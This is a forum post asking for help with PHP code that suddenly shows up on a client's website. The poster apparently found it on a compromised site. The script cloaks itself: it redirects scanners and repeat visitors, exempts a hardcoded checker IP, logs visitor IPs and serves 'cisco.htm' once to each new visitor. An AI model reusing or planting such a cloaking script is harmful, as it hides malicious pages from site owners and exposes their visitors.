A client's website was running fine. Suddenly the code below appears instead of their website. Caveats: it works fine on a Mac. Some PC users see the code and others do not. If you hit the refresh button, the website reappears. Has anyone seen this code before? Thanks.
<? $google="http://google.com"; $checker_ip="212.117.164.85"; $_SERVER['REMOTE_ADDR']=explode(", ",$_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR']=$_SERVER['REMOTE_ADDR'][0]; // --------------------------------------------------------------------- $time=@date(DATE_RFC822); $host=$_SERVER['HTTP_X_FORWARDED_HOST']; $file= @date("Y-m-d_h"); // --------------------------------------------------------------------- // if not set HTTP_X_FORWARDED_HOST || domain name if(!$host)exit(header("Location:{$google}")); // if not set REAL IP if(!$_SERVER['HTTP_X_FORWARDED_FOR'])exit(header("Location:{$google}")); // --------------------------------------------------------------------- $IP = "{$_SERVER[REMOTE_ADDR]}.log"; function _log() { global $IP; touch (".tmp/{$IP}"); } function _check() { global $IP; if(!file_exists(".tmp/{$IP}")) return true; } if(!_check() && $_SERVER['REMOTE_ADDR'] != $checker_ip) { if(!$host)exit(header("Location:{$google}")); if(!$_SERVER['HTTP_X_FORWARDED_FOR'])exit(header("Location:{$host}")); exit(header("Location:http://{$host}")); } _log(); // --------------------------------------------------------------------- if ( strpos($host, "thedetroitbureau.com") === false) wr_file_a("logs/{$file}", $time. " > ".$host. " > " .$_SERVER[REMOTE_ADDR]. "\n"); // --------------------------------------------------------------------- echo file_get_contents( "cisco.htm" ); function wr_file_a($fname, $content) { if(strlen($content) == 0) return 0; $fpp = @fopen($fname, "a+"); if ($fpp) { @flock($fpp, LOCK_EX); @fwrite($fpp, $content); @flock($fpp, LOCK_UN); @fclose($fpp); return 1; } return 0; }